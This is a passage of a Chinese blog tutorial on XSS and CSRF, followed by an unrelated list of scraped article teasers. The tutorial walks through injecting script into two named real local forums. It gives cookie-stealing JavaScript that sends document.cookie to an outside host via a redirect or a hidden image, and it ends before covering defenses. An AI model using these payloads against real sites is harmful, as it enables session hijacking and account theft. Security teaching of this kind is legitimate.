PHP相关系列 - XSS相关

关于XSS（跨站脚本攻击）和CSRF（跨站请求伪造）

我们常说的网络安全其实应该包括以下三方面的安全：
1、机密性，比如用户的隐私被窃取，帐号被盗，常见的方式是木马。
2、完整性，比如数据的完整，举个例子，康熙传位十四子，被当时四阿哥篡改遗诏：传位于四子，当然这是传说，常见的方式是XSS跨站脚本攻击和csrf跨站请求伪造。
3、可用性，比如我们的网络服务是否可用，常用的攻击方式是dos和ddos，拒绝服务和分布式拒绝服务攻击。

本文主要讲述xss和csrf的攻击，配合实例讲述这2者攻击的危害性以及一些防范的措施，有讲的不对或者不完整的地方欢迎大大们补充说明。

注：本站攻击的例子都是原生的实例，并没有借鉴网上的例子，另外请各位大侠高抬贵手不要随便乱试哦~，本文旨在指出攻击的手段和防范的方法。

XSS是什么？它的全名是：Cross-site scripting，为了和CSS层叠样式表区分所以取名XSS。是一种网站应用程序的安全漏洞攻击，是代码注入的一种。它允许恶意用户将代码注入到网页上，其他用户在观看网页时就会受到影响。这类攻击通常包含了HTML以及用户端脚本语言。
而CSRF是什么呢？CSRF全名是Cross-site request forgery，是一种对网站的恶意利用，CSRF比XSS更具危险性。想要深入理解CSRF的攻击特性我们有必要了解一下网站session的工作原理。

session我想大家都不陌生，无论你用.net或PHP开发过网站的都肯定用过session对象，然而session它是如何工作的呢？如果你不清楚请往下看。
先问个小问题：如果我把浏览器的cookie禁用了，大家认为session还能正常工作吗？

答案是否定的，我在这边举个简单的例子帮助大家理解session。
比如我买了一张高尔夫俱乐部的会员卡，俱乐部给了我一张带有卡号的会员卡。我能享受哪些权利（比如我是高级会员卡可以打19洞和后付费喝饮料，而初级会员卡只能在练习场挥杆）以及我的个人资料都是保存在高尔夫俱乐部的数据库里的。我每次去高尔夫俱乐部只需要出示这张高级会员卡，俱乐部就知道我是谁了，并且为我服务了。

这里我们的高级会员卡卡号 = 保存在cookie的sessionid；
而我的高级会员卡权利和个人信息就是服务端的session对象了。

我们知道http请求是无状态的，也就是说每次http请求都是独立的无关之前的操作的，但是每次http请求都会将本域下的所有cookie作为http请求头的一部分发送给服务端，所以服务端就根据请求中的cookie存放的sessionid去session对象中找到该会员资料了。
当然session的保存方法多种多样，可以保存在文件中，也可以内存里，考虑到分布式的横向扩展我们还是建议把它保存在第三方媒介中，比如redis或者mongodb。

我们理解了session的工作机制后，CSRF也就很容易理解了。CSRF攻击就相当于恶意用户A复制了我的高级会员卡，哪天恶意用户A也可以拿着这张假冒的高级会员卡去高尔夫俱乐部打19洞，享受美味的饮料了，而我在月底就会收到高尔夫俱乐部的账单！

了解CSRF的机制之后，危害性我相信大家已经不言而喻了，我可以伪造某一个用户的身份给其好友发送垃圾信息，这些垃圾信息的超链接可能带有木马程序或者一些诈骗信息（比如借钱之类的），如果CSRF发送的垃圾信息还带有蠕虫链接的话，那些接收到这些有害信息的好友万一打开私信中的连接就也成为了有害信息的散播着，这样数以万计的用户被窃取了资料种植了木马。整个网站的应用就可能在瞬间奔溃，用户投诉，用户流失，公司声誉一落千丈甚至面临倒闭。曾经在MSN上，一个美国的19岁的小伙子Samy利用css的background漏洞几小时内让100多万用户成功的感染了他的蠕虫，虽然这个蠕虫并没有破坏整个应用，只是在每一个用户的签名后面都增加了一句“Samy 是我的偶像”，但是一旦这些漏洞被恶意用户利用，后果将不堪设想，同样的事情也曾经发生在新浪微博上面。

想要CSRF获取用户的信息，就必须XSS注入成功，下面的例子我只是简单的注入alert('xss')，至于恶意用户完全可以把alert('xss')换成他想要的任意的js代码，用来发送post或者get请求修改用户的资料，获取用户好友信息，伪造发送私信，甚至做成蠕虫散播到整个web应用，所以千万不要小看了XSS注入攻击带来的后果，并不是alert一个对话框那么简单！

下面我们就卷起袖子开始我们的XSS之旅：

1、实例：XSS注入名城苏州论坛
我是苏州人，我就先拿本地的官方论坛www.2500sz.com开刀吧。
我打开2500sz.com的论坛然后注册了一个帐号，发布一个新话题，输入以下代码：

上面的代码就是输入一个网络分享的图片，我在src中直接写入了javascript:alert('xss')；操作成功后生成帖子，用IE6、7的用户打开这个我发的这个帖子就会出现下图的alert('xss')弹窗。

当然我会将标题设计的非常吸引人点击，比如 “陈冠希艳照又有流出2012版(20P无码)” ，这样如果我将里面的alert换成恶意代码，比如：
location.href='http://www.xss.com?cookie='+document.cookie；用户的cookie我也拿到了，如果服务端session没有设置过期的话，我以后甚至拿这个cookie而不需用户名密码，就可以以这个用户的身份登录成功了。
这里的location.href只是处于简单这样做，如果做了跳转这个帖子很快会被管理员删除，但是如果我写如下代码，并且帖子的内容也是比较真实的，说不定这个帖子就会祸害很多人：

var img = document.createElement('img');
img.src='http://www.xss.com?cookie='+document.cookie;
img.style.display='none';
document.getElementsByTagName('body')[0].appendChild(img);

这样就神不知鬼不觉的把当前用户的cookie发送给了我的恶意站点，我的恶意站点通过获取get参数就拿到了用户的cookie。当然我们可以通过这个方法拿到用户各种各样的数据。

2、还是苏州本地sns，苏州人社区
我们访问www.szr.com社区，这是一个面向于苏州人的sns社区，主要界面是抄袭的新浪微博。
注入尝试1：

直接输入

你可能感兴趣的:(PHP相关系列)

FPGA - 现场可编程门阵列 LFE3-17EA-6MG328C choushanchou4289
FPGA-现场可编程门阵列LFE3-17EA-6MG328C制造商:Lattice产品种类:FPGA-现场可编程门阵列封装:Tray系列:LFE3商标:LatticeCNHTS:8542319000HTS代码:8542310001MXHTS:85423199产品类型:FPGA-FieldProgrammableGateArray工厂包装数量:168子类别:ProgrammableLogicICsT
Spring-Security（二）OAuth2认证详解（持续更新） lbmydream spring cloud 架构 spring 探析 spring java 后端
SpringSecurity&Oauth2系列：SpringSecurity（一）源码分析及认证流程SpringSecurity（二）OAuth2认证详解及自定义异常处理文章目录1、OAuth2.0简介1.1OAuth2.0相关名词解释1.2四种授权模式1.3、OAuth2框架1.4OAuth2.0客户端提供功能2、OAuth2.0认证服务2.1SpringSecurityOAuth2提供的程序实
设计模式-离线并发模式-乐观离线锁（Optimistic Offline Lock） workflower 设计方法设计模式数据库课程设计开发语言设计语言需求分析
作用通过冲突监测和事务回滚来防止并发业务事务中的冲突。一个业务事务的执行常常跨越一系列的系统事务。超出单个系统事务范围时，不能依靠数据库管理系统来确保业务事务中数据的一致性。乐观锁验证会话之间的修改冲突，悲观锁直接限制系统并发行。运行机制通过检查在会话读取一条记录后，没有其他会话修改该数据来保证数据的一致性。只要系统对数据库有修改，就需要获取乐观离线锁。可以通过对每条记录关联一个版本号的方法跟踪修
《夏天里成长》人文性积累 2022-11-22 定投的奇迹
1、原文：昨天是苞蕾，今天是鲜花，明天就变成了小果实。原文含义是昨天，今天，明天，在一个时间段中，生物在跳跃的生长着。可做人文性积累即世界观的引导：昨天、今天、明天是时间的系列，非一时，而是有跨度的时间段联想。我们看待事物要用联系、发展的眼光看即遇到事，不仅看现在，还要看过去和未来。就会避免诸多负面、不利情绪的滋生。2、原文：“一过夏天，小学生有的成了中学生，中学生有的成了大学生。升级、跳班，快点
Node.js sqlite3事件深入解析：trace、profile、change、error、open 软考鸭 sqlite nodejs帮助文档 node.js sqlite 数据库
在Node.js环境中，sqlite3库不仅提供了丰富的API用于数据库操作，还定义了一系列的事件，使得开发者能够监听和响应数据库操作过程中的各种状态变化。本文将深入解析sqlite3库中的trace、profile、change、error、open这五个事件，包括它们的作用、触发时机以及如何使用代码进行监听和处理。一、事件概述trace事件：当数据库执行SQL语句时触发，可以用于跟踪和记录SQ
比利时必玩打卡地系列--Mercator Museum 陈岩ludovic
MercatorMuseum坐标：SINT-NIKLAAS,BELGIUMGerardMercator于1512年出生在比利时的Rupelmonde。作为一个年轻人，他证明了自己是一位熟练的绘图员，雕刻师和乐器制造者，以及一位精明的数学家。就像当时的时尚一样，他将自己的名字从GerarddeKremer改为拉丁版“Mercator”。他首先通过帮助地球仪的刻字和组装来熟悉地图制作，但他很快就开始设
Redis 键值对操作全攻略加勒比海涛 Redis 入门实践 redis 数据库
文章目录一.get和set二.keys*三.exists四.del五.expire六.ttl七.Redis的key的过期策略八.定时器的实现8.1基于优先级队列8.2基于时间轮实现的定时器九.type十.数据库管理相关命令Hello,大家好,这个专栏给大家带来的是Redis系列!本篇文章给大家带来的是Redis一些最基础的命令,那这些命令并没有涉及到Redis核心数据结构,只是简单的操作键值对,难
【Unity3D杂谈】记一次优化shader性能的过程留待舞人归 unity 游戏引擎游戏
一、问题描述我们的手游的主场景主要由一系列的2D图片的SpriteRenderer组成，有一片大的水面背景，有一个shader去实现了水颜色渐变和波纹的效果。在岛上有很多建筑物。按理论上，有更多建筑的区域应该渲染压力更大，而纯水面的地方应该只有一个shader在渲染。但是经测试发现，在一个低端的Android手机上（大约千元的三星手机）上，发现将相机拖动到只有背景海面的区域，帧率也会明显下降，明显
Linux配置NTP时间同步思静语 Linux&运维安装 linux 运维服务器
在Linux系统中，配置NTP服务器（服务端）和NTP客户端（客户端）以确保系统时间的准确性涉及不同的步骤。下面是如何配置NTP服务端和客户端的详细说明。NTP服务端配置安装NTP服务在NTP服务器上安装NTP服务包。Debian/Ubuntu系列:sudoaptupdatesudoaptinstallntpRHEL/CentOS系列:sudoyuminstallntpFedora:sudodnf
莆田鞋厂哪个比较出名，莆田知名鞋厂排行榜一览表腕表鞋屋
莆田鞋厂哪个比较出名，莆田知名鞋厂排行榜一览表莆田鞋比较出名鞋厂有协丰鞋业、鑫龙鞋业、新协胜鞋业、和顺鞋业、新荔丰鞋业、西天尾双凤鞋业等等。微信:a43947(下单赠送精美礼品)1、福建协丰鞋业有限公司。隶属于福建大丰集团。坐落在福建省莆田市涵江区西。该厂主要生产SHOX系列运动鞋和篮球鞋，还生产nikesb系列和dunksb系列、airforce1系列等复古鞋。2、莆田市鑫龙鞋业有限公司3、莆田
物联网架构之HBase Linux运维老纪一蹴而就揭秘物联网“点石成金”的魔法架构 hbase 运维开发 linux 云计算
欢迎来到我的博客，很高兴能够在这里和您见面！希望您在这里可以感受到一份轻松愉快的氛围，不仅可以获得有趣的内容和知识，也可以畅所欲言、分享您的想法和见解。推荐:Linux运维老纪的首页,持续学习,不断总结,共同进步,活到老学到老导航剑指大厂系列:全面总结运维核心技术:系统基础、数据库、网路技术、系统安全、自动化运维、容器技术、监控工具、脚本编程、云服务等。常用运维工具系列:常用的运维开发工具,zab
自然语言处理系列五十》文本分类算法》SVM支持向量机算法原理陈敬雷-充电了么-CEO兼CTO 算法大数据人工智能算法自然语言处理分类 nlp ai 人工智能 chatgpt
注：此文章内容均节选自充电了么创始人，CEO兼CTO陈敬雷老师的新书《自然语言处理原理与实战》（人工智能科学与技术丛书）【陈敬雷编著】【清华大学出版社】文章目录自然语言处理系列五十SVM支持向量机》算法原理SVM支持向量机》代码实战总结自然语言处理系列五十SVM支持向量机》算法原理SVM支持向量机在文本分类的应用场景中，相比其他机器学习算法有更好的效果。下面介绍其原理，并用SparkMLlib机器
新三板投资之——精选层再见，喜迎北交所蛙声叫叫一家亲
“今天是个喜大普奔的好日子，北交所正式挂牌开市了，存续了一年多的精选层也从此落下帷幕。这将是最后一篇新三板精选层投资系列的文字，诸多感慨，还是要抒发一下。开始更新的日子，其实是伴随着精选层投资的分析，至今一年多的时间。这个过程经历了从发现金矿般的喜悦到首批上市破发的错愕，再到精挑细选逐步找到投资逻辑的兴奋，最后是这突如其来的北交所感天动地。时间进入倒计时，还有一个多钟头，81支原精选层股票挂牌北交
区块链钱包分析第三期-Toshi RP
最近在搞区块链，之后每天会更新一篇区块链相关产品的分析和亮点分享，希望：-看到文章的产品经理朋友们提供一些意见和建议，尤其欢迎挑错，挑出错误饭局伺候-钱包分析系列不但会有市面上热门的钱包分析，也会包含一些个人对于区块链钱包的见解，仅供大家参考今天要分析的是一款不那么钱包的钱包，Toshi，名字来源于中本聪（SatoshiNakamoto），即比特币的创始人延续上期所说的“场景化钱包”的概念，Tos
鸿蒙系列一：启动流程与米同乐 HarmonyOS
引导程序有过电脑系统装机经历的人都知道BIOS的概念，为Android手机刷机过的小伙伴都听过Bootloader，那这些概念和手机启动有什么关系呢？首先，无论是电脑还是手机，操作系统都不是开机就直接启动的，都是通过引导程序来帮助启动操作系统的，对于电脑来说BIOS起到了这个功能，对于手机则是Bootloader来担此重任。可能有些人会有疑问，电脑和手机的开机为什么不直接启动操作系统，而是
图神经网络实战（18）——消息传播神经网络盼小辉丶图神经网络从入门到项目实战 pytorch 深度学习图神经网络
图神经网络实战（18）——消息传播神经网络0.前言1.消息传播神经网络2.实现MPNN框架小结系列链接0.前言我们已经学习了多种图神经网络(GraphNeuralNetworks,GNN)变体，包括图卷积网络(GraphConvolutionalNetwork,GCN)、图注意力网络(GraphAttentionNetworks，GAT)和GraphSAGE等。在本节中，我们将对这些变体GNN结构
[范文赏析代码复盘]2023高教社杯数学建模国赛C题详细代码文章数据教学保姆级手把手包含文档格式 2024数模国赛教学:蔬菜类商品的自动定价和补货决策千千小屋grow 2024数学建模国赛全程辅导数学建模 c语言开发语言
本系列专栏将包括两大块内容第一块赛前真题和模型教学,包括至少8次真题实战教学,每期教学专栏的最底部会提供完整的资料百度网盘包括:真题、数据、可复现代码以及文章.第二块包括赛中思路、代码、文章的参考助攻,会提供2024年高教社国赛各个赛题的全套参考内容(一般36h内更新完毕),欢迎订阅!蔬菜类商品的自动定价和补货决策在上一篇博客中2023高教社C题建模和结果分析我们详细的进行了2023高教社杯数学建
姚晨《都挺好》：为女当如苏明玉（之二）兰陵木木生
（这篇是苏明玉系列之二，之一是原生家庭篇，之二是路遇贵人篇。）知遇之恩或许就是当你一个人在黑暗中踽踽独行，在精神的荒原上茫茫不知所往之时，有那么一个有能量有资源的前辈带给你的所有光与希望。——题记01苏明玉很有钱。有网友甚至调侃说，如果能像她这么有钱，所有的事都不是事。可是苏明玉为什么可以这么有钱？有人说，因为她遇到了蒙总。蒙总确实算是改变苏明玉一生的人物，她生命中的贵人。千里马常有，而伯乐不常有
界面控件开发包DevExpress v24.1.4全新发布界面开发小八哥 devexpress ui 界面控件 UI开发 .net
DevExpressUniversal拥有.NET开发需要的所有平台控件，包含600多个UI控件、报表平台、DevExpressDashboardeXpressApp框架、适用于VisualStudio的CodeRush等一系列辅助工具。屡获大奖的软件开发平台DevExpress近期重要版本v24.1已正式发布，该版本拥有众多新产品和数十个具有高影响力的功能，可为桌面、Web和移动应用提供直观的解
班级管理系列——小事不小 525bfad68727
今天早自习，早操的时候还差三分钟，我站在队伍的最前面，看到班里稀稀拉拉的1/3的同学战战队，我就问为什么还有三分钟，咱班的人还这么少班的同学回答说，老师你要相信一分钟之内他们所有人都会到齐的，我就站在那里默默的观看，当到6点整的时候，我发现还有一部分人没有来，因为队伍中缺少了一些人，虽然我叫不出具体的名字，但我知道他们在到6:03的时候，6:01的时候，又陆陆续续一些人出来了到6:03最后一个同学
《神奇的早起》日记14-2022-08-17 糖糖82
睡觉时间：23：15起床时间：5：00睡眠时间：5小时45钟早起计划任务情况：1.昨日计划情况原计划内容：完成15周课程笔记梳理。完成情况：完成了一半2.今日计划情况计划内容：完成另一半15周笔记梳理今日思考：1.今日起床居然不困，一下醒过来了，只是做运动时感觉整个人快不起来，所以做完防瞌睡一系列动作时间到5:45了，比原来计划的5:30晚了15分钟，观察最近执行早起计划的总体情况，计划22:00
一直想健身，也一直坚持不下来馨韵珍Jany
健身的重要性自不必多说，疫情期间，在考验每个人免疫力的情况下，健身更是成为人人急需提上日程的事项。回顾这些年来，我集中锻炼身体总是带有明显的功利性：读高中时晚上去操场跑步，是为了缓解因长时间解题带来的头疼；缴纳一年健身房费用，并坚持去了大半年，是为了备孕；因读一系列跑步的书而“学习”跑步；因减肥或体检报告一条条建议而健身......原因各有不同，但结果大同小异，都是锻炼一两个月之后就不了了之了。问
玩具测评丨PUTITTO奇谈俱乐部哆啦a梦杯沿玩偶（第二弹）玩具宅
PUTITTO（奇谈俱乐部）第一弹推出了全哆啦a梦的杯沿玩偶，至于它的小伙伴们怎么会缺席？继续推出其他角色的第二弹，其实在缺少哆啦a梦“主角光环”的情况下，第二弹销量的确不高，甚至接下来PUTITTO单独推出了静香的个人“SOLO”系列...销量更为惨淡（第二弹也是全4款，附带超大的蛋纸）（同样是“盲盒”的随机抽取款式...坑钱大法）【大雄】（大雄竟然做出来“跪拜”的动作...）（当然内有“玄机”
一场饭局若山若水
昨天晚上，接到一个小同事的微信，约我今天参加她准备的聚餐，原因是她元旦要结婚了。我立马答应了，这是她人生的大事，喜事，我当然要捧场啦！下班后，我和同事相约来到酒店。刚来到酒店门口，就看到同事小两口打开车门走下来——车是奥迪，具体啥系列咱不懂，总之很气派。一边走，另一个同事小声告诉我，新郎官是二婚，而且带着个小女孩，我瞬间感觉心里不太舒服。同事不是本地人，前年考到济阳来的，小姑娘开朗活泼，大方成熟，
《变态心理学》第十四章物质使用和赌博障碍心喜欢生0003
1、物质是指天然或合成的、具有精神活性作用的产品。最常用的导致物质相关障碍的五种物质是:（1）、中枢神经系统抑制剂，包括酒精、巴比妥类（2）、中枢神经系统兴奋剂，包括可卡因、尼古丁和咖啡因（3）、阿片类物质（4）、致幻剂和苯环利定（5）、大麻2、物质中毒是物质对中枢神经系统的生理作用而直接产生的一些列行为和心理变化。物质截断是指长期大量使用物质的人停止或减少使用物质所导致的一系列生理和行为症状。物
Meta Force元宇宙：探索未来虚拟世界的无限可能口碑信息传播者
在数字技术的浪潮中，元宇宙的概念逐渐从科幻走向现实。而今天，我们有幸能够一同见证MetaForce元宇宙的诞生与发展。作为这一新兴领域的佼佼者，MetaForce正以其独特的生态系统，引领我们走进一个全新的虚拟世界。13分钟视频内容讲明白原力元宇宙创富项目，中国区运营服务对接微信：ForceZen不久前，我们迎来了MetaForce路线图活动系列的第四集视频成品。与以往不同，这一次我们将信息部分与
JAVA学习-深入研究容器.List的功能方法守护者170 java学习 java 学习 list 开发语言
Java中的List接口是Collection接口的子接口之一，它扩展了Collection接口，提供了一系列用于操作和管理有序集合的方法。一、List接口的功能方法以及它们的特点如下：1.添加元素：可以使用`add(Ee)`方法在列表的末尾添加一个元素，也可以使用'add(intindex,Eelement)'方法将元素插入到指定位置。2.删除元素：可以使用'remove(Objecto)'方法
科研绘图系列：R语言单细胞差异基因四分图（Quad plot）生信学习者2 R语言可视化 r语言数据分析数据挖掘
介绍在单细胞分析领域，为了探究不同分组间同一细胞类型的基因表达差异，研究者们常采用四分图（QuadPlot）作为分析工具。该图形的横轴代表比较组1，而纵轴代表比较组2。通过这种布局，四分图能够有效地展示两组间共有的差异表达基因，从而为深入理解细胞类型在不同条件下的分子特性提供直观的视角。这种可视化方法不仅揭示了组间基因表达的异同，还有助于识别可能在生物学过程或疾病发生中起关键作用的基因。加载R包导
科研绘图系列：R语言组合堆积图（stacked barplot with multiple groups）生信学习者2 R语言可视化 r语言数据可视化
介绍通常堆积图的X轴表示样本，样本可能会存在较多的分组信息，通过组合堆积图和样本标签分组信息，我们可以得到一张能展示更多信息的可发表图形。加载R包knitr::opts_chunk$set(warning=F,message=F)library(tidyverse)library(cowplot)library(patchwork)导入数据数据可从以下链接下载（画图所需要的所有数据）：百度云盘链接
C for Graphic：shader中各种贴图羊羊2035 入门图形学之C for Graphic
转载：shader中各种贴图一个三维场景的画面的好坏，百分之四十取决于模型，百分之六十取决于贴图，可见贴图在画面中所占的重要性。在这里我将列举一系列贴图，并且初步阐述其概念，理解原理的基础上制作贴图，也就顺手多了。漫反射贴图diffusemap漫反射贴图在游戏中表现出物体表面的反射和表面颜色。换句话说，它可以表现出物体被光照射到而显出的颜色和强度。我们通过颜色和明暗来绘制一幅漫反射贴图，在这张贴图
Spring4.1新特性——Spring MVC增强 jinnianshilongnian spring 4.1
目录 Spring4.1新特性——综述 Spring4.1新特性——Spring核心部分及其他 Spring4.1新特性——Spring缓存框架增强 Spring4.1新特性——异步调用和事件机制的异常处理 Spring4.1新特性——数据库集成测试脚本初始化 Spring4.1新特性——Spring MVC增强 Spring4.1新特性——页面自动化测试框架Spring MVC T
mysql 性能查询优化 annan211 java sql 优化 mysql 应用服务器
1 时间到底花在哪了？ mysql在执行查询的时候需要执行一系列的子任务，这些子任务包含了整个查询周期最重要的阶段，这其中包含了大量为了检索数据列到存储引擎的调用以及调用后的数据处理，包括排序、分组等。在完成这些任务的时候，查询需要在不同的地方花费时间，包括网络、cpu计算、生成统计信息和执行计划、锁等待等。尤其是向底层存储引擎检索数据的调用操作。这些调用需要在内存操
windows系统配置 cherishLC windows
删除Hiberfil.sys ：使用命令powercfg -h off 关闭休眠功能即可： http://jingyan.baidu.com/article/f3ad7d0fc0992e09c2345b51.html 类似的还有pagefile.sys msconfig 配置启动项 shutdown 定时关机 ipconfig 查看网络配置 ipconfig /flushdns
人体的排毒时间 Array_06 工作
======================== || 人体的排毒时间是什么时候？|| ======================== 转载于： http://zhidao.baidu.com/link?url=ibaGlicVslAQhVdWWVevU4TMjhiKaNBWCpZ1NS6igCQ78EkNJZFsEjCjl3T5EdXU9SaPg04bh8MbY1bR
ZooKeeper cugfy zookeeper
Zookeeper是一个高性能，分布式的，开源分布式应用协调服务。它提供了简单原始的功能，分布式应用可以基于它实现更高级的服务，比如同步，配置管理，集群管理，名空间。它被设计为易于编程，使用文件系统目录树作为数据模型。服务端跑在java上，提供java和C的客户端API。 Zookeeper是Google的Chubby一个开源的实现，是高有效和可靠的协同工作系统，Zookeeper能够用来lea
网络爬虫的乱码处理随意而生爬虫网络
下边简单总结下关于网络爬虫的乱码处理。注意，这里不仅是中文乱码，还包括一些如日文、韩文、俄文、藏文之类的乱码处理，因为他们的解决方式是一致的，故在此统一说明。网络爬虫，有两种选择，一是选择nutch、hetriex，二是自写爬虫，两者在处理乱码时，原理是一致的，但前者处理乱码时，要看懂源码后进行修改才可以，所以要废劲一些；而后者更自由方便，可以在编码处理
Xcode常用快捷键张亚雄 xcode
一、总结的常用命令：隐藏xcode command+h 退出xcode command+q 关闭窗口 command+w 关闭所有窗口 command+option+w 关闭当前
mongoDB索引操作 adminjun mongodb 索引
一、索引基础： MongoDB的索引几乎与传统的关系型数据库一模一样，这其中也包括一些基本的优化技巧。下面是创建索引的命令： > db.test.ensureIndex({"username":1}) 可以通过下面的名称查看索引是否已经成功建立： &nbs
成都软件园实习那些话 aijuans 成都软件园实习
无聊之中，翻了一下日志，发现上一篇经历是很久以前的事了，悔过~~ 　　断断续续离开了学校快一年了，习惯了那里一天天的幼稚、成长的环境，到这里有点与世隔绝的感觉。不过还好，那是刚到这里时的想法，现在感觉在这挺好，不管怎么样，最要感谢的还是老师能给这么好的一次催化成长的机会，在这里确实看到了好多好多能想到或想不到的东西。　　都说在外面和学校相比最明显的差距就是与人相处比较困难，因为在外面每个人都
Linux下FTP服务器安装及配置 ayaoxinchao linux FTP服务器 vsftp
检测是否安装了FTP [root@localhost ~]# rpm -q vsftpd 如果未安装：package vsftpd is not installed 安装了则显示：vsftpd-2.0.5-28.el5累死的版本信息安装FTP 运行yum install vsftpd命令，如[root@localhost ~]# yum install vsf
使用mongo-java-driver获取文档id和查找文档 BigBird2012 driver
注：本文所有代码都使用的mongo-java-driver实现。在MongoDB中，一个集合（collection）在概念上就类似我们SQL数据库中的表（Table），这个集合包含了一系列文档（document）。一个DBObject对象表示我们想添加到集合（collection）中的一个文档（document），MongoDB会自动为我们创建的每个文档添加一个id，这个id在
JSONObject以及json串 bijian1013 json JSONObject
一.JAR包简介要使程序可以运行必须引入JSON-lib包，JSON-lib包同时依赖于以下的JAR包： 1.commons-lang-2.0.jar 2.commons-beanutils-1.7.0.jar 3.commons-collections-3.1.jar &n
[Zookeeper学习笔记之三]Zookeeper实例创建和会话建立的异步特性 bit1129 zookeeper
为了说明问题，看个简单的代码， import org.apache.zookeeper.*; import java.io.IOException; import java.util.concurrent.CountDownLatch; import java.util.concurrent.ThreadLocal
【Scala十二】Scala核心六：Trait bit1129 scala
Traits are a fundamental unit of code reuse in Scala. A trait encapsulates method and field definitions, which can then be reused by mixing them into classes. Unlike class inheritance, in which each c
weblogic version 10.3破解 ronin47 weblogic
版本：WebLogic Server 10.3 说明：%DOMAIN_HOME%：指WebLogic Server 域(Domain）目录例如我的做测试的域的根目录 DOMAIN_HOME=D:/Weblogic/Middleware/user_projects/domains/base_domain 1.为了保证操作安全，备份%DOMAIN_HOME%/security/Defa
求第n个斐波那契数 BrokenDreams
今天看到群友发的一个问题：写一个小程序打印第n个斐波那契数。自己试了下，搞了好久。。。基础要加强了。 &nbs
读《研磨设计模式》-代码笔记-访问者模式-Visitor bylijinnan java 设计模式
声明：本文只为方便我个人查阅和理解，详细的分析以及源代码请移步原作者的博客http://chjavach.iteye.com/ import java.util.ArrayList; import java.util.List; interface IVisitor { //第二次分派，Visitor调用Element void visitConcret
MatConvNet的excise 3改为网络配置文件形式 cherishLC matlab
MatConvNet为vlFeat作者写的matlab下的卷积神经网络工具包，可以使用GPU。主页： http://www.vlfeat.org/matconvnet/ 教程： http://www.robots.ox.ac.uk/~vgg/practicals/cnn/index.html 注意：需要下载新版的MatConvNet替换掉教程中工具包中的matconvnet： http
ZK Timeout再讨论 chenchao051 zookeeper timeout hbase
http://crazyjvm.iteye.com/blog/1693757 文中提到相关超时问题，但是又出现了一个问题，我把min和max都设置成了180000，但是仍然出现了以下的异常信息： Client session timed out, have not heard from server in 154339ms for sessionid 0x13a3f7732340003
CASE WHEN 用法介绍 daizj sql group by case when
CASE WHEN 用法介绍 1. CASE WHEN 表达式有两种形式 --简单Case函数 CASE sex WHEN '1' THEN '男' WHEN '2' THEN '女' ELSE '其他' END --Case搜索函数 CASE WHEN sex = '1' THEN
PHP技巧汇总:提高PHP性能的53个技巧 dcj3sjt126com PHP
PHP技巧汇总:提高PHP性能的53个技巧　　用单引号代替双引号来包含字符串，这样做会更快一些。因为PHP会在双引号包围的字符串中搜寻变量，　　单引号则不会，注意：只有echo能这么做，它是一种可以把多个字符串当作参数的函数译注：　　PHP手册中说echo是语言结构，不是真正的函数，故把函数加上了双引号)。　　1、如果能将类的方法定义成static，就尽量定义成static，它的速度会提升将近4倍
Yii框架中CGridView的使用方法以及详细示例 dcj3sjt126com yii
CGridView显示一个数据项的列表中的一个表。表中的每一行代表一个数据项的数据,和一个列通常代表一个属性的物品(一些列可能对应于复杂的表达式的属性或静态文本)。　　CGridView既支持排序和分页的数据项。排序和分页可以在AJAX模式或正常的页面请求。使用CGridView的一个好处是,当用户浏览器禁用JavaScript,排序和分页自动退化普通页面请求和仍然正常运行。实例代码如下：
Maven项目打包成可执行Jar文件 dyy_gusi assembly
Maven项目打包成可执行Jar文件在使用Maven完成项目以后，如果是需要打包成可执行的Jar文件，我们通过eclipse的导出很麻烦，还得指定入口文件的位置，还得说明依赖的jar包，既然都使用Maven了，很重要的一个目的就是让这些繁琐的操作简单。我们可以通过插件完成这项工作，使用assembly插件。具体使用方式如下： 1、在项目中加入插件的依赖： <plugin>
php常见错误 geeksun PHP
1. kevent() reported that connect() failed (61: Connection refused) while connecting to upstream, client: 127.0.0.1, server: localhost, request: "GET / HTTP/1.1", upstream: "fastc
修改linux的用户名 hongtoushizi linux change password
Change Linux Username 更改Linux用户名，需要修改4个系统的文件： /etc/passwd /etc/shadow /etc/group /etc/gshadow 古老/传统的方法是使用vi去直接修改，但是这有安全隐患（具体可自己搜一下），所以后来改成使用这些命令去代替： vipw vipw -s vigr vigr -s 具体的操作顺
第五章常用Lua开发库1-redis、mysql、http客户端 jinnianshilongnian nginx lua
对于开发来说需要有好的生态开发库来辅助我们快速开发，而Lua中也有大多数我们需要的第三方开发库如Redis、Memcached、Mysql、Http客户端、JSON、模板引擎等。一些常见的Lua库可以在github上搜索，https://github.com/search?utf8=%E2%9C%93&q=lua+resty。 Redis客户端 lua-resty-r
zkClient 监控机制实现 liyonghui160com zkClient 监控机制实现
直接使用zk的api实现业务功能比较繁琐。因为要处理session loss，session expire等异常，在发生这些异常后进行重连。又因为ZK的watcher是一次性的，如果要基于wather实现发布/订阅模式，还要自己包装一下，将一次性订阅包装成持久订阅。另外如果要使用抽象级别更高的功能，比如分布式锁，leader选举
在Mysql 众多表中查找一个表名或者字段名的 SQL 语句 pda158 mysql
在Mysql 众多表中查找一个表名或者字段名的 SQL 语句：　　方法一：SELECT table_name, column_name from information_schema.columns WHERE column_name LIKE 'Name'; 　　方法二：SELECT column_name from information_schema.colum
程序员对英语的依赖 Smile.zeng 英语程序猿
1、程序员最基本的技能，至少要能写得出代码，当我们还在为建立类的时候思考用什么单词发牢骚的时候，英语与别人的差距就直接表现出来咯。 2、程序员最起码能认识开发工具里的英语单词，不然怎么知道使用这些开发工具。 3、进阶一点，就是能读懂别人的代码，有利于我们学习人家的思路和技术。 4、写的程序至少能有一定的可读性，至少要人别人能懂吧... 以上一些问题，充分说明了英语对程序猿的重要性。骚年
Oracle学习笔记(8) 使用PLSQL编写触发器 vipbooks oracle sql 编程活动 Access
时间过得真快啊，转眼就到了Oracle学习笔记的最后个章节了，通过前面七章的学习大家应该对Oracle编程有了一定了了解了吧，这东东如果一段时间不用很快就会忘记了，所以我会把自己学习过的东西做好详细的笔记，用到的时候可以随时查找，马上上手！希望这些笔记能对大家有些帮助！这是第八章的学习笔记，学习完第七章的子程序和包之后

按字母分类： A B C D E F G H I J K L M N O P Q R S T U V W X Y Z 其他